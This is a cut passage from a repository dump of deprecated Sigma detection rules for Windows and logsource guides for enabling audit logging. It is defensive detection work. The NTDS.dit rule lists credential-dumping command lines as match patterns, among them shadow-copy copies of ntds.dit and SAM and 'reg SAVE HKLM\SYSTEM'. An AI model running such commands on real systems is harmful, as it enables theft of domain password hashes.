    "content": "title: Security Event Log Cleared\nid: a122ac13-daf8-4175-83a2-72c387be339d\nstatus: deprecated\ndescription: Checks for event id 1102 which indicates the security event log was cleared.\nreferences:\n    - https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml\nauthor: Saw Winn Naung\ndate: 2021/08/15\nmodified: 2023/12/06\ntags:\n    - attack.t1070.001\nlogsource:\n    service: security\n    product: windows\ndetection:\n    selection:\n        EventID: 1102\n        Provider_Name: Microsoft-Windows-Eventlog\n    condition: selection\nfalsepositives:\n    - Legitimate administrative activity\nfields:\n    - SubjectLogonId\n    - SubjectUserName\n    - SubjectUserSid\n    - SubjectDomainName\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/win_security_group_modification_logging.yml",
    "content": "title: Group Modification Logging\nid: 9cf01b6c-e723-4841-a868-6d7f8245ca6e\nstatus: deprecated\ndescription: |\n  Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges.\n  Sigma detects\n  Event ID 4728 indicates a \"Member is added to a Security Group\".\n  Event ID 4729 indicates a \"Member is removed from a Security enabled-group\".\n  Event ID 4730 indicates a \"Security Group is deleted\".\n  The case is not applicable for Unix OS.\n  Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP.\nreferences:\n    - https://www.cisecurity.org/controls/cis-controls-list/\n    - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf\n    - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634\nauthor: Alexandr Yampolskyi, SOC Prime\ndate: 2019/03/26\nmodified: 2023/04/26\n# tags:\n    # - CSC4\n    # - CSC4.8\n    # - NIST CSF 1.1 PR.AC-4\n    # - NIST CSF 1.1 PR.AT-2\n    # - NIST CSF 1.1 PR.MA-2\n    # - NIST CSF 1.1 PR.PT-3\n    # - ISO 27002-2013 A.9.1.1\n    # - ISO 27002-2013 A.9.2.2\n    # - ISO 27002-2013 A.9.2.3\n    # - ISO 27002-2013 A.9.2.4\n    # - ISO 27002-2013 A.9.2.5\n    # - ISO 27002-2013 A.9.2.6\n    # - ISO 27002-2013 A.9.3.1\n    # - ISO 27002-2013 A.9.4.1\n    # - ISO 27002-2013 A.9.4.2\n    # - ISO 27002-2013 A.9.4.3\n    # - ISO 27002-2013 A.9.4.4\n    # - PCI DSS 3.2 2.1\n    # - PCI DSS 3.2 7.1\n    # - PCI DSS 3.2 7.2\n    # - PCI DSS 3.2 7.3\n    # - PCI DSS 3.2 8.1\n    # - PCI DSS 3.2 8.2\n    # - PCI DSS 3.2 8.3\n    # - PCI DSS 3.2 8.7\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID:\n            - 4728 # A member was added to a security-enabled global group\n            - 4729 # A member was removed from a security-enabled global group\n            - 4730 # A security-enabled global group was deleted\n            - 633 # Security Enabled Global Group Member Removed\n            - 632 # Security Enabled Global Group Member Added\n            - 634 # Security Enabled Global Group Deleted\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "deprecated/windows/win_security_lolbas_execution_of_nltest.yml",
    "content": "title: Correct Execution of Nltest.exe\nid: eeb66bbb-3dde-4582-815a-584aee9fe6d1\nstatus: deprecated\ndescription: The attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions.\nreferences:\n    - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm\n    - https://attack.mitre.org/software/S0359/\nauthor: Arun Chauhan\ndate: 2021/10/04\nmodified: 2023/02/02\ntags:\n    - attack.discovery\n    - attack.t1482 # enumerate trusted domains by using commands such as nltest /domain_trusts\n    - attack.t1018 # enumerate remote domain controllers using options such as /dclist and /dsgetdc\n    - attack.t1016 # enumerate the parent domain of a local machine using /parentdomain\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4689\n        ProcessName|endswith: 'nltest.exe'\n        Status: '0x0'\n    condition: selection\nfields:\n    - 'SubjectUserName'\n    - 'SubjectDomainName'\nfalsepositives:\n    - Red team activity\n    - Rare legitimate use by an administrator\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/win_security_windows_defender_exclusions_write_deleted.yml",
    "content": "title: Windows Defender Exclusion Deleted\nid: a33f8808-2812-4373-ae95-8cfb82134978\nrelated:\n    - id: e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d\n      type: derived\n    - id: 46a68649-f218-4f86-aea1-16a759d81820\n      type: derived\nstatus: deprecated\ndescription: |\n    Detects when a Windows Defender exclusion has been deleted. This could indicate an attacker trying to delete their tracks by removing the added exclusions\nreferences:\n    - https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/\nauthor: '@BarryShooshooga'\ndate: 2019-10-26\nmodified: 2025-01-30\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: Audit Policy : Security Settings/Local Policies/Audit Policy, Registry System Access Control (SACL): Auditing/User'\ndetection:\n    selection:\n        EventID: 4660 # An object was deleted.\n        ObjectName|contains: '\\Microsoft\\Windows Defender\\Exclusions\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/win_susp_esentutl_activity.yml",
    "content": "title: Suspicious Esentutl Use\nid: 56a8189f-11b2-48c8-8ca7-c54b03c2fbf7\nstatus: deprecated\ndescription: Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance. \nauthor: Florian Roth (Nextron Systems)\ndate: 2020/05/23\nmodified: 2022/04/11\nreferences:\n    - https://lolbas-project.github.io/\n    - https://twitter.com/chadtilbury/status/1264226341408452610\ntags:\n    - attack.defense_evasion\n    - attack.execution\n    - attack.s0404\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - ' /vss '\n            - ' /y '\n    condition: selection\nfields:\n    - CommandLine\n    - ParentCommandLine\nfalsepositives:\n    - Administrative activity\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/win_susp_rclone_exec.yml",
    "content": "title: Rclone Execution via Command Line or PowerShell\nid: cb7286ba-f207-44ab-b9e6-760d82b84253\ndescription: Detects Rclone which is commonly used by ransomware groups for exfiltration\nstatus: deprecated\ndate: 2021/05/26\nmodified: 2022/04/11\nauthor: Aaron Greetham (@beardofbinary) - NCC Group\nreferences:\n    - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/\ntags:\n    - attack.exfiltration\n    - attack.t1567.002\nfalsepositives:\n    - Legitimate Rclone usage (rare)\nlevel: high\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    exec_selection:\n        Image|endswith: '\\rclone.exe'\n        ParentImage|endswith:\n            - '\\PowerShell.exe'\n            - '\\cmd.exe'\n    command_selection:\n        CommandLine|contains:\n            - ' pass '\n            - ' user '\n            - ' copy '\n            - ' mega '\n            - ' sync '\n            - ' config '\n            - ' lsd '\n            - ' remote '\n            - ' ls '\n    description_selection:\n      Description: 'Rsync for cloud storage'\n    condition: command_selection and ( description_selection or exec_selection )\n"
  },
  {
    "path": "deprecated/windows/win_susp_vssadmin_ntds_activity.yml",
    "content": "title: Activity Related to NTDS.dit Domain Hash Retrieval\nid: b932b60f-fdda-4d53-8eda-a170c1d97bbd\nstatus: deprecated\ndescription: Detects suspicious commands that could be related to activity that uses volume shadow copy to steal and retrieve hashes from the NTDS.dit file remotely\nauthor: Florian Roth (Nextron Systems), Michael Haag\ndate: 2019/01/16\nmodified: 2022/04/11\nreferences:\n    - https://www.swordshield.com/2015/07/getting-hashes-from-ntds-dit-file/\n    - https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/\n    - https://www.trustwave.com/Resources/SpiderLabs-Blog/Tutorial-for-NTDS-goodness-(VSSADMIN,-WMIS,-NTDS-dit,-SYSTEM)/\n    - https://securingtomorrow.mcafee.com/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/\n    - https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/\ntags:\n    - attack.credential_access\n    - attack.t1003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine:\n            - 'vssadmin.exe Delete Shadows'\n            - 'vssadmin create shadow /for=C:'\n            - 'copy \\\\?\\GLOBALROOT\\Device\\\\*\\windows\\ntds\\ntds.dit'\n            - 'copy \\\\?\\GLOBALROOT\\Device\\\\*\\config\\SAM'\n            - 'vssadmin delete shadows /for=C:'\n            - 'reg SAVE HKLM\\SYSTEM '\n            - 'esentutl.exe /y /vss *\\ntds.dit*'\n            - 'esentutl.exe /y /vss *\\SAM'\n            - 'esentutl.exe /y /vss *\\SYSTEM'\n    condition: selection\nfields:\n    - CommandLine\n    - ParentCommandLine\nfalsepositives:\n    - Administrative activity\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/win_system_service_install_susp_double_ampersand.yml",
    "content": "title: New Service Uses Double Ampersand in Path\nid: ca83e9f3-657a-45d0-88d6-c1ac280caf53\nstatus: deprecated\ndescription: Detects a service installation that uses a suspicious double ampersand used in the image path value\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2022/07/05\nmodified: 2023/11/15\ntags:\n    - attack.defense_evasion\n    - attack.t1027\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ImagePath|contains: '&&'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/win_system_susp_sam_dump.yml",
    "content": "title: SAM Dump to AppData\nid: 839dd1e8-eda8-4834-8145-01beeee33acd\nstatus: deprecated\ndescription: Detects suspicious SAM dump activity as cause by QuarksPwDump and other password dumpers\nauthor: Florian Roth (Nextron Systems)\ndate: 2018/01/27\nmodified: 2024/01/18\ntags:\n    - attack.credential_access\n    - attack.t1003.002\nlogsource:\n    product: windows\n    service: system\n    definition: The source of this type of event is Kernel-General\ndetection:\n    selection:\n        Provider_Name: Microsoft-Windows-Kernel-General\n        EventID: 16\n    keywords:\n        '|all':\n            - '\\AppData\\Local\\Temp\\SAM-'\n            - '.dmp'\n    condition: selection and keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "documentation/README.md",
    "content": ""
  },
  {
    "path": "documentation/logsource-guides/other/antivirus.md",
    "content": "**Coming Soon**"
  },
  {
    "path": "documentation/logsource-guides/windows/category/process_creation.md",
    "content": "# category: process_creation\n\nID: 2ff912e8-159f-4789-a2ef-761292b32a23\n\n## Content\n\n<details>\n    <summary>Expand</summary>\n\n- [category: process\\_creation](#category-process_creation)\n  - [Content](#content)\n  - [Description](#description)\n  - [Event Source(s)](#event-sources)\n  - [Logging Setup](#logging-setup)\n    - [Microsoft Windows Security Auditing](#microsoft-windows-security-auditing)\n      - [Process Creation](#process-creation)\n      - [Include Command-Line In Process Creation Events](#include-command-line-in-process-creation-events)\n    - [Microsoft-Windows-Sysmon](#microsoft-windows-sysmon)\n      - [Process Creation](#process-creation-1)\n  - [Event Fields](#event-fields)\n    - [Provider: Microsoft Windows Security Auditing / EventID: 4688](#provider-microsoft-windows-security-auditing--eventid-4688)\n    - [Provider: Microsoft-Windows-Sysmon / EventID: 1](#provider-microsoft-windows-sysmon--eventid-1)\n\n</details>\n\n## Description\n\nThis logsource guide describes how to enable the necessary logging to make use of SIGMA rules that leverage the `process_creation` category.\n\n## Event Source(s)\n\nThis section describes the event source(s) that are required to be collected in order to receive the events used by the `process_creation` category detection rules\n\n```yml\nProvider: Microsoft Windows Security Auditing\nGUID: {54849625-5478-4994-a5ba-3e3b0328c30d}\nChannel: Security\nEventID: 4688\n```\n\n```yml\nProvider: Microsoft-Windows-Sysmon\nGUID: {5770385f-c22a-43e0-bf4c-06f5698ffbd9}\nChannel: Microsoft-Windows-Sysmon/Operational\nEventID: 1\n```\n\n## Logging Setup\n\nThis section describes how to setup logging in your environment\n\n### Microsoft Windows Security Auditing\n\n#### Process Creation\n\n- Subcategory GUID: `{0CCE922B-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `High`\n- EventID(s):\n  - `4688`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Detailed Tracking\n                        - Audit Process Creation\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE922B-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE922B-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-process-creation)\n\n#### Include Command-Line In Process Creation Events\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Administrative Templates\n        - System\n            - Audit Process Creation\n                - Include Command Line In Process Creation Events\n```\n\n### Microsoft-Windows-Sysmon\n\n#### Process Creation\n\n- Provider: `Microsoft-Windows-Sysmon`\n- Channel: `Microsoft-Windows-Sysmon/Operational`\n- Event Volume: `High`\n- EventID(s):\n  - `1`\n\nTo configure Sysmon process creation events you can follow the instructions below\n\n- Download [Sysmon](https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon)\n- Install Sysmon using an appropriate configuration. The configuration must include a `<ProcessCreate>` element. We recommend the following configuration [sysmonconfig-export.xml](https://github.com/Neo23x0/sysmon-config/blob/master/sysmonconfig-export.xml).\n\n```powershell\nsysmon -i /path/to/config\n```\n\n## Event Fields\n\n> **Note**\n>\n> For rules using this category in SIGMA. Know that there is a mapping between `Sysmon EID 1` fields and `Microsoft Windows Security Auditing EID: 4688`. While you can use the fields of `EID 4688` it's best to use the Sysmon ones.\n\n### Provider: Microsoft Windows Security Auditing / EventID: 4688\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- SubjectUserSid\n- SubjectUserName\n- SubjectDomainName\n- SubjectLogonId\n- NewProcessId\n- NewProcessName\n- TokenElevationType\n- ProcessId\n- CommandLine\n- TargetUserSid\n- TargetUserName\n- TargetDomainName\n- TargetLogonId\n- ParentProcessName\n- MandatoryLabel\n```\n\n</details>\n\n### Provider: Microsoft-Windows-Sysmon / EventID: 1\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- RuleName\n- UtcTime\n- ProcessGuid\n- ProcessId\n- Image\n- FileVersion\n- Description\n- Product\n- Company\n- OriginalFileName\n- CommandLine\n- CurrentDirectory\n- User\n- LogonGuid\n- LogonId\n- TerminalSessionId\n- IntegrityLevel\n- Hashes\n- ParentProcessGuid\n- ParentProcessId\n- ParentImage\n- ParentCommandLine\n- ParentUser\n```\n\n</details>\n"
  },
  {
    "path": "documentation/logsource-guides/windows/category/ps_module.md",
    "content": "# category: ps_module\n\nID: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\n\n## Content\n\n<details>\n    <summary>Expand</summary>\n\n- [category: ps\\_module](#category-ps_module)\n  - [Content](#content)\n  - [Description](#description)\n  - [Event Source(s)](#event-sources)\n    - [PowerShell 5](#powershell-5)\n    - [PowerShell 7](#powershell-7)\n  - [Logging Setup](#logging-setup)\n    - [Microsoft-Windows-PowerShell](#microsoft-windows-powershell)\n    - [Provider: PowerShellCore](#provider-powershellcore)\n  - [Event Fields](#event-fields)\n    - [Provider: Microsoft-Windows-PowerShell / EventID: 4103 (PowerShell 5)](#provider-microsoft-windows-powershell--eventid-4103-powershell-5)\n    - [Provider: PowerShellCore / EventID: 4103 (PowerShell 7)](#provider-powershellcore--eventid-4103-powershell-7)\n\n</details>\n\n## Description\n\nThis logsource guide describes how to enable the necessary logging to make use of SIGMA rules that leverage the `ps_module` category.\n\n## Event Source(s)\n\n### PowerShell 5\n\n```yml\nProvider: Microsoft-Windows-PowerShell\nGUID: {a0c1853b-5c40-4b15-8766-3cf1c58f985a}\nChannel: Microsoft-Windows-PowerShell/Operational\nEventID: 4103\n```\n\n### PowerShell 7\n\n```yml\nProvider: PowerShellCore\nGUID: {f90714a8-5509-434a-bf6d-b1624c8a19a2}\nChannel: PowerShellCore/Operational\nEventID: 4103\n```\n\n## Logging Setup\n\n### Microsoft-Windows-PowerShell\n\n- Event Volume: TBD\n- EventID(s):\n  - `4103`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Administrative Templates\n        - Windows Components\n            - Windows PowerShell\n                - Turn On Module Logging\n                  - Select List Of Modules According To Your Audit Policy (or use '*' to select all modules)\n```\n\n### Provider: PowerShellCore\n\n- Event Volume: TBD\n- EventID(s):\n  - `4103`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Administrative Templates\n        - PowerShell Core\n            - Turn On Module Logging\n              - Select List Of Modules According To Your Audit Policy (or use '*' to select all modules)\n```\n\n> **Note**\n>\n> By default when you install PowerShell 7 the logging template isn't available. You can install it by using the PowerShell script available in the installation directory `InstallPSCorePolicyDefinitions.ps1`\n\n## Event Fields\n\n### Provider: Microsoft-Windows-PowerShell / EventID: 4103 (PowerShell 5)\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- ContextInfo\n- UserData\n- Payload\n```\n\n</details>\n\n### Provider: PowerShellCore / EventID: 4103 (PowerShell 7)\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- ContextInfo\n- UserData\n- Payload\n```\n\n</details>\n"
  },
  {
    "path": "documentation/logsource-guides/windows/category/ps_script.md",
    "content": "# category: ps_script\n\nID: bade5735-5ab0-4aa7-a642-a11be0e40872\n\n## Content\n\n<details>\n    <summary>Expand</summary>\n\n- [category: ps\\_script](#category-ps_script)\n  - [Content](#content)\n  - [Description](#description)\n  - [Event Source(s)](#event-sources)\n    - [PowerShell 5](#powershell-5)\n    - [PowerShell 7](#powershell-7)\n  - [Logging Setup](#logging-setup)\n    - [Provider: Microsoft-Windows-PowerShell](#provider-microsoft-windows-powershell)\n    - [Provider: PowerShellCore](#provider-powershellcore)\n  - [Event Fields](#event-fields)\n    - [Provider: Microsoft-Windows-PowerShell / EventID: 4103 (PowerShell 5)](#provider-microsoft-windows-powershell--eventid-4103-powershell-5)\n    - [Provider: PowerShellCore / EventID: 4103 (PowerShell 7)](#provider-powershellcore--eventid-4103-powershell-7)\n\n</details>\n\n## Description\n\nThis logsource guide describes how to enable the necessary logging to make use of SIGMA rules that leverage the `ps_script` category.\n\n## Event Source(s)\n\n### PowerShell 5\n\n```yml\nProvider: Microsoft-Windows-PowerShell\nGUID: {a0c1853b-5c40-4b15-8766-3cf1c58f985a}\nChannel: Microsoft-Windows-PowerShell/Operational\nEventID: 4104\n```\n\n### PowerShell 7\n\n```yml\nProvider: PowerShellCore\nGUID: {f90714a8-5509-434a-bf6d-b1624c8a19a2}\nChannel: PowerShellCore/Operational\nEventID: 4104\n```\n\n## Logging Setup\n\n### Provider: Microsoft-Windows-PowerShell\n\n- Event Volume: TBD\n- EventID(s):\n  - `4104`\n\n```yml\n- Computer Configuration\n    - Administrative Templates\n        - Windows Components\n            - Windows PowerShell\n                - Turn On PowerShell Script Block Logging\n```\n\n### Provider: PowerShellCore\n\n- Event Volume: TBD\n- EventID(s):\n  - `4104`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Administrative Templates\n        - PowerShell Core\n            - Turn On PowerShell Script Block Logging\n```\n\n> **Note**\n>\n> By default when you install PowerShell 7 the logging template isn't available. You can install it by using the PowerShell script available in the installation directory `InstallPSCorePolicyDefinitions.ps1`\n\n## Event Fields\n\n### Provider: Microsoft-Windows-PowerShell / EventID: 4103 (PowerShell 5)\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- MessageNumber\n- MessageTotal\n- ScriptBlockText\n- ScriptBlockId\n- Path\n```\n\n</details>\n\n### Provider: PowerShellCore / EventID: 4103 (PowerShell 7)\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- MessageNumber\n- MessageTotal\n- ScriptBlockText\n- ScriptBlockId\n- Path\n```\n</details>\n"
  },
  {
    "path": "documentation/logsource-guides/windows/category/registry_add.md",
    "content": "**Coming Soon**"
  },
  {
    "path": "documentation/logsource-guides/windows/category/registry_delete.md",
    "content": "**Coming Soon**"
  },
  {
    "path": "documentation/logsource-guides/windows/category/registry_event.md",
    "content": "**Coming Soon**"
  },
  {
    "path": "documentation/logsource-guides/windows/category/registry_rename.md",
    "content": "**Coming Soon**"
  },
  {
    "path": "documentation/logsource-guides/windows/category/registry_set.md",
    "content": "**Coming Soon**"
  },
  {
    "path": "documentation/logsource-guides/windows/service/powershell.md",
    "content": "**Coming Soon**"
  },
  {
    "path": "documentation/logsource-guides/windows/service/security.md",
    "content": "# service: security\n\nID: dfd8c0f4-e6ad-4e07-b91b-f2fca0ddef64\n\n## Content\n\n<details>\n    <summary>Details</summary>\n\n- [service: security](#service-security)\n  - [Content](#content)\n  - [Description](#description)\n  - [Event Source(s)](#event-sources)\n  - [Logging Setup](#logging-setup)\n    - [Account Logon](#account-logon)\n      - [Credential Validation](#credential-validation)\n      - [Kerberos Authentication Service](#kerberos-authentication-service)\n      - [Kerberos Service Ticket Operations](#kerberos-service-ticket-operations)\n      - [Other Account Logon Events](#other-account-logon-events)\n    - [Account Management](#account-management)\n      - [Application Group Management](#application-group-management)\n      - [Computer Account Management](#computer-account-management)\n      - [Distribution Group Management](#distribution-group-management)\n      - [Other Account Management Events](#other-account-management-events)\n      - [Security Group Management](#security-group-management)\n      - [User Account Management](#user-account-management)\n    - [Detailed Tracking](#detailed-tracking)\n      - [DPAPI Activity](#dpapi-activity)\n      - [PNP Activity](#pnp-activity)\n      - [Process Creation](#process-creation)\n      - [Process Termination](#process-termination)\n      - [RPC Events](#rpc-events)\n      - [Token Right Adjusted](#token-right-adjusted)\n    - [DS Access](#ds-access)\n      - [Detailed Directory Service Replication](#detailed-directory-service-replication)\n      - [Directory Service Access](#directory-service-access)\n      - [Directory Service Changes](#directory-service-changes)\n      - [Directory Service Replication](#directory-service-replication)\n    - [Logon/Logoff](#logonlogoff)\n      - [Account Lockout](#account-lockout)\n      - [User/Device Claims](#userdevice-claims)\n      - [Group Membership](#group-membership)\n      - [IPsec Extended Mode](#ipsec-extended-mode)\n      - [IPsec Main Mode](#ipsec-main-mode)\n      - [IPsec Quick Mode](#ipsec-quick-mode)\n      - [Logoff](#logoff)\n      - [Logon](#logon)\n      - [Network Policy Server](#network-policy-server)\n      - [Other Logon/Logoff Events](#other-logonlogoff-events)\n      - [Special Logon](#special-logon)\n    - [Object Access](#object-access)\n      - [Application Generated](#application-generated)\n      - [Certification Services](#certification-services)\n      - [Detailed File Share](#detailed-file-share)\n      - [File Share](#file-share)\n      - [File System](#file-system)\n      - [Filtering Platform Connection](#filtering-platform-connection)\n      - [Filtering Platform Packet Drop](#filtering-platform-packet-drop)\n      - [Handle Manipulation](#handle-manipulation)\n      - [Kernel Object](#kernel-object)\n      - [Other Object Access Events](#other-object-access-events)\n      - [Registry](#registry)\n      - [Removable Storage](#removable-storage)\n      - [SAM](#sam)\n      - [Central Access Policy Staging](#central-access-policy-staging)\n    - [Policy Change](#policy-change)\n      - [Audit Policy Change](#audit-policy-change)\n      - [Authentication Policy Change](#authentication-policy-change)\n      - [Authorization Policy Change](#authorization-policy-change)\n      - [Filtering Platform Policy Change](#filtering-platform-policy-change)\n      - [MPSSVC Rule-Level Policy Change](#mpssvc-rule-level-policy-change)\n      - [Other Policy Change Events](#other-policy-change-events)\n    - [Privilege Use](#privilege-use)\n      - [Non Sensitive Privilege Use](#non-sensitive-privilege-use)\n      - [Other Privilege Use Events](#other-privilege-use-events)\n      - [Sensitive Privilege Use](#sensitive-privilege-use)\n    - [System](#system)\n      - [IPsec Driver](#ipsec-driver)\n      - [Other System Events](#other-system-events)\n      - [Security State Change](#security-state-change)\n      - [Security System Extension](#security-system-extension)\n      - [System Integrity](#system-integrity)\n    - [Global Object Access Auditing](#global-object-access-auditing)\n  - [Full Event(s) List](#full-events-list)\n  - [Event Fields](#event-fields)\n    - [Provider: Microsoft Windows Security Auditing / EventID: 4624](#provider-microsoft-windows-security-auditing--eventid-4624)\n    - [Provider: Microsoft Windows Security Auditing / EventID: 4627](#provider-microsoft-windows-security-auditing--eventid-4627)\n    - [Provider: Microsoft Windows Security Auditing / EventID: 4663](#provider-microsoft-windows-security-auditing--eventid-4663)\n    - [Provider: Microsoft Windows Security Auditing / EventID: 4670](#provider-microsoft-windows-security-auditing--eventid-4670)\n    - [Provider: Microsoft Windows Security Auditing / EventID: 4672](#provider-microsoft-windows-security-auditing--eventid-4672)\n    - [Provider: Microsoft Windows Security Auditing / EventID: 4673](#provider-microsoft-windows-security-auditing--eventid-4673)\n    - [Provider: Microsoft Windows Security Auditing / EventID: 4688](#provider-microsoft-windows-security-auditing--eventid-4688)\n    - [Provider: Microsoft Windows Security Auditing / EventID: 4689](#provider-microsoft-windows-security-auditing--eventid-4689)\n    - [Provider: Microsoft Windows Security Auditing / EventID: 4702](#provider-microsoft-windows-security-auditing--eventid-4702)\n    - [Provider: Microsoft Windows Security Auditing / EventID: 4703](#provider-microsoft-windows-security-auditing--eventid-4703)\n    - [Provider: Microsoft Windows Security Auditing / EventID: 4957](#provider-microsoft-windows-security-auditing--eventid-4957)\n    - [Provider: Microsoft Windows Security Auditing / EventID: 5447](#provider-microsoft-windows-security-auditing--eventid-5447)\n\n</details>\n\n## Description\n\nThis logsource guide describes how to enable the necessary logging to make use of SIGMA rules that leverage the `security` service.\n\n## Event Source(s)\n\n```yml\nProvider: Microsoft Windows Security Auditing\nGUID: {54849625-5478-4994-a5ba-3e3b0328c30d}\nChannel: Security\n```\n\n## Logging Setup\n\n### Account Logon\n\n#### Credential Validation\n\n- Subcategory GUID: `{0CCE923F-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `High`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4774`\n  - `4775`\n  - `4776`\n  - `4777`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Account Logon\n                        - Audit Credential Validation\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE923F-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE923F-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-credential-validation)\n\n#### Kerberos Authentication Service\n\n- Subcategory GUID: `{0CCE9242-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `High on Kerberos Key Distribution Center servers`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4768`\n  - `4771`\n  - `4772`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Account Logon\n                        - Audit Kerberos Authentication Service\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9242-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9242-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-kerberos-authentication-service)\n\n#### Kerberos Service Ticket Operations\n\n- Subcategory GUID: `{0CCE9240-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Very High on Kerberos Key Distribution Center servers`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 